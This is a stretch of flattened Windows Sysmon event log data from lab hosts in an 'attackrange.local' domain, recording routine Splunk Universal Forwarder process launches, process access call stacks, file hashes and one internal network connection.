07:44:52.877{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F2F4-60EB-F47C-00000000CF01}7976C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046133Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.878{466BC892-F2F4-60EB-F47C-00000000CF01}7976C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001046132Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.524{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=755D57FCC081D35F10F6FF60CEDAC583,SHA256=63C305B4D5C88FBA5229DAE8C70AFE55AAEB59CA4A6D67308537FE86F64256FC,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000001046131Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.393{466BC892-F2F4-60EB-F37C-00000000CF01}53369992C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001046130Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:43.764{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50917-false10.0.1.12-8000- 10341000x80000000000000001046129Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.224{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F2F4-60EB-F37C-00000000CF01}5336C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046128Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:52.208{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046127Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.208{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046126Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:52.208{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046125Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.208{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046124Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.208{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F2F4-60EB-F37C-00000000CF01}5336C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046123Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.208{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F2F4-60EB-F37C-00000000CF01}5336C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046122Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.209{466BC892-F2F4-60EB-F37C-00000000CF01}5336C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806208Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:53.847{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B2AF9720C678510035BCCA1EBBBE2BC,SHA256=73ACCC683DD3EB0E1DBA637273C4378B14905269524F942BD4471A3DD6138C9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046163Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:53.939{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C263258AD4C1CE24480C9BC4BE240B46,SHA256=26F541555C833BE291874AB7A07D1BDB58D06FAF0F982A80BFC5E3777ACF2118,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046162Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:53.892{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=350659B954C4449CB5A3D0DB0CE561D2,SHA256=0298F3A77CF4D297F6AD7FBAC2977097DFA1E0C3D57223E95FBDCB9945387FF3,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000001046161Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:53.776{466BC892-F2F5-60EB-F57C-00000000CF01}94889796C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046160Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:53.561{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F2F5-60EB-F57C-00000000CF01}9488C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046159Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:53.561{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046158Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:53.561{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046157Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:53.561{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046156Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:53.561{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046155Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:53.561{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F2F5-60EB-F57C-00000000CF01}9488C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046154Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:53.561{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F2F5-60EB-F57C-00000000CF01}9488C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046153Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:53.555{466BC892-F2F5-60EB-F57C-00000000CF01}9488C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001046172Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:54.959{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D980FD163D8209F612DC47A10F0DBE70,SHA256=3EC5881CE21065DBC0BFA6805292FF4F518723B0DA5D29EAF0658147A09FDE74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806209Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:54.862{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54CF9F9634744130189BA1C490799B15,SHA256=7137F2951BF2275B8579217324CDC3F6E1EE58991DEEF8E53A52ACC7099EF124,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046171Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:54.157{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F2F6-60EB-F67C-00000000CF01}4136C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001046170Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:54.154{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046169Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:54.154{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046168Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:54.138{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046167Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 